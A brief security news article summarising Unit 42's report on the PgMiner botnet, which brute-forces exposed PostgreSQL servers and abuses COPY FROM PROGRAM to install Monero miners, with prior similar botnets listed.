Security researchers discover PgMiner botnet that attacks PostgreSQL databases

Security researchers have discovered a botnet – referred to as PgMiner – that attacks PostgreSQL databases with a weak level of security that are running on Linux servers.

Palo Alto Networks’ Unit 42 reports that the botnet performs brute-force attacks aimed at PostgreSQL databases accessible online.

The attacks are pattern-based.

First, the botnet picks a network IP in a given range at random (such as 18.xxx.xxx.xxx).

Then, it searches for systems that have port 5432 (the one used by PostgreSQL) exposed online by iterating through these addresses.

If the search is successful, then the botnet changes from scanning mode to brute-force mode.

At this point, it inputs a long list of passwords in an attempt to seize control of the default ‘postgres’ account.

If the administrators have not disabled this user or left the default password as it is, then the hackers can barge in.

Once they are in, they can gain control of the entire operating system through the PostgreSQL COPY from PROGRAM feature.

From there, the PgMiner crew proceeds to deploy a coin-mining application with the intent to mine as much Monero cryptocurrency as possible before getting noticed.

At the time that the report was made public, Unit 42 claimed that the botnet had the ability to do this on the following platforms:

  • ARM
  • x64
  • Linux MIPS

One of the features of the PgMiner botnet is that it controls the infected systems via a command and control (C2) server through the Tor network.

The botnet’s codebase appears to be similar to the SystemdMiner botnet.

This is not the first time that PostgreSQL data-miner attacks have appeared in the wild though.

In 2018, similar attacks were observed – these were carried out by the StickyDB botnet.

Other databases have also been targeted by crypto-mining bots in the past – these include:

  • MySQL
  • MSSQL
  • OrientDB
  • Redis